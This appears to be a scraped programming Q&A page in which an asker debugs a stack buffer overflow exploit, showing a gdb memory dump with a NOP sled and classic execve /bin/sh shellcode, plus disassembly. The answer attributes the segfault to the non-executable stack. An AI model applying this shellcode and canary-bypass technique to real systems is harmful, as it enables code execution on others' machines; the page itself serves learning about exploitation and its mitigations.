stackoom
  简体   繁体   中英

Buffer overflow : EIP and jump correctly set but segfault

 原文  2016-04-09 00:07:44       c/ assembly/ gdb/ buffer-overflow/ eip

Question

I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained here . In short, you overwrite the address a pointer points to, with the address of the RET in the stack. So memcpy-ing to that pointer, effectively overwrites RET.

Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled.

(gdb) x /32xw $esp 0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000 0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090 0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090 0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c (gdb) 0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8 0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c 0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8 0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0 0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001 0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac 0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad 0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f

However , running this I get the error bellow, even though dissasembly shows I landed good. 

Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0:  nop
   0xbffff4c1:  nop
   0xbffff4c2:  nop
   0xbffff4c3:  nop
   0xbffff4c4:  nop
   0xbffff4c5:  nop
   0xbffff4c6:  nop
   0xbffff4c7:  nop
   0xbffff4c8:  nop
   0xbffff4c9:  nop

Further below is the shellcode. 

    0xbffff4df:  jmp    0xbffff500
   0xbffff4e1:  pop    %esi
   0xbffff4e2:  mov    %esi,0x8(%esi)
   0xbffff4e5:  xor    %eax,%eax
   0xbffff4e7:  mov    %al,0x7(%esi)
   0xbffff4ea:  mov    %eax,0xc(%esi)
   0xbffff4ed:  mov    $0xb,%al
   0xbffff4ef:  mov    %esi,%ebx

... etc.

I used the shellcode from Smashing the stack , Appendix B, for the linux system. Can you help me understand what's wrong?

1 answers

solution1
 4 ACCPTED  2016-04-09 00:28:48

You didn't say what OS you are on, or how you built your target program.

Assuming Linux and no -Wl,-z,execstack , modern Linux distributions default to -Wl,-z,noexecstack , which (surprise!) makes stack non-executable.

You can read about some of the protection mechanisms here .

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Buffer Overflow - Finding EIP Causing a buffer overflow, segfault shellcode buffer overflow -SegFault buffer overflow doesn't reach eip Simple buffer overflow EIP overwrite not working EIP value incorrect during buffer overflow Buffer overflow to jump to a disabled function Why does eip doesn't change in this buffer overflow attempt? Buffer overflow exploit : segfault on function ret to stack code Buffer Overflow Test on Fedora 32-bit not changing $eip register value
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM